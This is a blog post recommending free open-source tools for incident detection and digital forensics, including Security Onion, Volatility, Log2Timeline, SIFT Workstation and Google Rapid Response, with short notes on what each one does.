Here are some useful open source projects for detecting and investigating incidents. A couple of them I just found out about today.
A while ago Mandiant released a free tool called IOC-Editor
to create Indicator Of Compromise (IOC) signatures. So if you investigate an attack you can create IOCs from your analysis, which can be used to check other computers on your network for specific criteria such as a file name, MD5 hash, process, open port, registry key, etc., that indicate other computers have been compromised as well.
Now there is a new Python project called PyIOC
that allows you to push out a client program to computers on your network, which will run and download .ioc files from a server and check to see if any other computers are showing signs they have been compromised. It apparently has both a Windows and Linux client.
List of current checks it's capable of:
2) Security Onion
makes Network Security Monitoring way easier than it is now. It includes everything you need to investigate IDS alerts. With a couple clicks you can drill down from a Snort alert and get easy access full content PCAPs, http logs, session logs, syslogs, OSSEC logs, run a database query, etc.
The latest version that's going to be released shortly includes an easy installer where you can install a sensor in around 10 minutes.
Presentation video: Security Onion Network Security Monitoring in minutes
3) Volatility 2.2
is written in Python and can analyze memory images and has been beyond awesome on Windows. How analysts have gone so long without memory analysis like this is amazing. It now officially supports both 32 and 64 bit versions of Linux. You can see in the above link there are all kinds of plugins, and people are continually coming up with new ones. I just saw a plugin yesterday that can even get a screenshot of the Windows desktop from a memory image, and I'm sure equally cool Linux plugins will follow.
The really cool thing is that just like malware has problems hiding on a dead hard drive, it also has problems hiding from a memory image loaded in Volatility.
I just discovered Enterprise Log Search and Archive (ELSA)
, which is basically an open source alternative to Splunk. It acts as kind of a Google for your logs by normalizing various logs, and allowing you to easily run fairly complex queries: Example
It's also going to be included in the 12.04 release of Security Onion, which is currently in Beta, but due for official release soon.
Analysts used to create timelines solely based on the MAC times of files. Now they're creating "supertimelines" that incorporate not just MAC times from files, but logs, browser history, and all kinds of other sources of evidence that have a timestamp associated with them using Log2Timeline
. Being able to see a timeline that contains evidence other than just MAC times allows analysts to have more context, and a better understanding of what happened.
There is BackTrack for pentesting, there is Security Onion for NSM, and there is SANS Investigate Forensic Toolkit (SIFT) Workstation
for digital forensics. It contains Log2Timeline, Volatility, The Sleuth Kit, and a heck of a lot more tools to perform digital forensics, and is updated with the latest tools fairly often.
7) Google Rapid Response (GRR)
is a Python framework for live remote forensics. You can connect to remote computers and run Volatility plugins, The Sleuth Kit, create timelines, get running processes, network connections, retrieve files, run commands, browse the file system, etc. Unfortunately, it's currently in Alpha stage, and has been for a while, but does seem to be updated every so often. User Manual
, but it's not a complete demo... Search for computer "domU".
We have all kinds of useful (and free) tools for detecting and investigating attacks right now. I'm sure there are more new projects coming up, so if you know of any, let me know.